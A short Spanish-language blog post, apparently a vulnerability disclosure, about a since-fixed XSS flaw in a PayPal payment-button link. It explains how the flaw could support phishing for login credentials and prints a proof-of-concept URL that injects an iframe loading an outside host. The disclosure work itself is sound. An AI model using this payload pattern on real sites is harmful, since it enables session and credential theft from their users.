Uno de los parámetros del enlace que proporciona Paypal para realizar pagos es vulnerable a XSS (Cross Site Scripting), que podría permitir el robo de la sesiones a clientes autentificados en Paypal.
Si este tipo de fallo ya de por sí es grave en una empresa de estas características, donde está localizado el bug incrementa enormemente las posibilidades de éxito ante ataques tipo Phising, un atacante podría cambiar el formulario de login incluido en esta página fácilmente por uno propio y obtener las credenciales del cliente, como su email y contraseña. Simplemente modificando el enlace de botón de pago proporcionado por Paypal.
La única limitación que tiene el bug es el tamaño máximo de la cadena a insertar, 23 caracteres, esto puede ser evadido fácilmente mediante acortadores de URL por ejemplo, siempre que trabajen bajo SSL.
https://www.paypal.com/cgi-bin/webscr?cmd=_s-xclick&hosted_button_id=UPWVULJWYUVT6&on0=%3Ciframe%20src%3D%2f%2fnimb.cc%2f%3Easdasd&os0=1208171032&on1=asd&os1=NUEVA ALMACEN DE BARRIO CENTRICO EN BUENOS AIRES INTERESADA EN ABASTECIMIENTO DE PRODUCTOS KOSHER\"\'
UPDATE: La vulnerabilidad ha sido corregida.
ADVISORY: http://seclists.org/fulldisclosure/2013/Jun/22
Vulnerabilidad descubierta por Jose Antonio Pérez
japp{at}0xlabs{dotz}com
No hay comentarios:
Publicar un comentario